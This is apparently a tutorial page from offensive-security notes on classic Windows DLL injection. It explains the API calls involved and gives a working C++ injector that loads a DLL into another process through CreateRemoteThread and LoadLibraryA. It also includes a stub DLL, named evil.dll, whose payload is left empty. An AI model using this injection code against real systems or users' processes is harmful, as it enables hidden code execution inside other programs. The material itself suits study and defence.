C++: Dll Injection

Objective

Inject a dll into a process.

To do list

Create a dll with DllMain method in order to execute its main function without exporting spesific function.
Select a process to inject dll.
Reserve virtual memory within specified process.
Put dll into process and execute it.

Functions

DllMain: Entry point of the dll. This will be used for executing desired actions.
- Definition: BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
  - Since there is no need to set parameters please check the references for what they are used for. Only parameter we care is fdwReason.
OpenProcess: To get a process handle.
- Definition: HANDLE OpenProcess(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwProcessId);
  - dwDesiredAccess: Access rights to the process. PROCESS_ALL_ACCESS. Check references for further information.
  - bInheritHandle: 0 as default. Check references for more options.
  - dwProcessId: Process id to get handle.
VirtualAllocEx: Reserve a memory space within the specified process.
- Definition: LPVOID VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType,DWORD flProtect);
  - hProcess: Handle of the process comes from OpenProcess function.
  - lpAddress: 0 as default. Check references for further information.
  - dwSize: Size of the Dllpath + 1. +1 is used for null terminator.
  - flAllocationType: MEM_COMMIT as default. Check references for further options.
  - flProtect: PAGE_READWRITE as default. Check references for further options.
WriteProcessMemory: Write data into reserved memory.
- Definition: BOOL WriteProcessMemory(HANDLE hProcess,LPVOID lpBaseAddress,LPCVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesWritten);
  - hProcess: process handle comes from OpenProcess.
  - lpBaseAddress: Pointer to the base address of reserved memory. Comes from VirtualAllocEx function.
  - lpBuffer: Pointer to the buffer that contains data. Path of the DLL in LPVOID format.
  - nSize: Size of the dll path +1. +1 is used for null terminator.
  - lpNumberOfBytesWritten: 0 as default. Check references for further options.
CreateRemoteThread: Create a thread that runs in the virtual address space of another process.
- Definition: HANDLE CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
  - hProcess: process handle comes from OpenProcess.
  - lpThreadAttributes: 0 as default. Check references for further information.
  - dwStackSize: 0 as default. Check references for further information.
  - lpStartAddress: A pointer to the application-defined function of type LPTHREAD_START_ROUTINE. This little bit messed-up check references for further information but you can use (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA") as default.
  - lpParameter: Variable of VirtualAllocEx function.
  - dwCreationFlags: 0 as default. Check references for further information.
  - lpThreadId: 0 as default. Check references for further information.
VirtualFreeEx: free the memory allocated for dll path.
- Definition: BOOL VirtualFreeEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType);
  - hProcess: process handle comes from OpenProcess.
  - lpAddress: Variable of VirtualAllocEx function
  - dwSize: Length of dllpath +1. +1 for null terminator.
  - dwFreeType: MEM_RELEASE as default.

Application (injectme.cpp)

#include <Windows.h>

BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call,LPVOID lpReserved)
{

//when dll is attached, do whatever you like to do.
	if (ul_reason_for_call == DLL_PROCESS_ATTACH){
	
		//some evil things.

    }

	return TRUE;
}

Compile: g++ -shared -o evil.dll injectme.cpp -std=c++11

Application (injector.cpp)

#include <Windows.h>

int main()
{
	//dll path
	LPCSTR DllPath = "C:\\users\\engin.demirbilek\\Desktop\\evil.dll";

	// Open a handle to target process. //11120 is process id.
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 11120);

	// Allocate memory for the dllpath in the process.
	
	LPVOID pDllPath = VirtualAllocEx(hProcess, 0, strlen(DllPath) + 1,
		MEM_COMMIT, PAGE_READWRITE);

	//write dll path to the address of the memory.
	WriteProcessMemory(hProcess, pDllPath, (LPVOID)DllPath,
		strlen(DllPath) + 1, 0);

//create a thread and execute the dll.
	HANDLE hLoadThread = CreateRemoteThread(hProcess, 0, 0,
		(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"),
			"LoadLibraryA"), pDllPath, 0, 0);

	// Free the memory allocated for our dll path
	VirtualFreeEx(hProcess, pDllPath, strlen(DllPath) + 1, MEM_RELEASE);

	return 0;
}

Compile: g++ injector.cpp -o injector.exe

References

PreviousC++: Enumerating Environment NextVBA: HTTP File Dropper

Last updated 3 years ago

Was this helpful?

#include <Windows.h> BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call,LPVOID lpReserved) { //when dll is attached, do whatever you like to do. if (ul_reason_for_call == DLL_PROCESS_ATTACH){ //some evil things. } return TRUE; }

#include <Windows.h> int main() { //dll path LPCSTR DllPath = "C:\\users\\engin.demirbilek\\Desktop\\evil.dll"; // Open a handle to target process. //11120 is process id. HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 11120); // Allocate memory for the dllpath in the process. LPVOID pDllPath = VirtualAllocEx(hProcess, 0, strlen(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE); //write dll path to the address of the memory. WriteProcessMemory(hProcess, pDllPath, (LPVOID)DllPath, strlen(DllPath) + 1, 0); //create a thread and execute the dll. HANDLE hLoadThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA"), pDllPath, 0, 0); // Free the memory allocated for our dll path VirtualFreeEx(hProcess, pDllPath, strlen(DllPath) + 1, MEM_RELEASE); return 0; }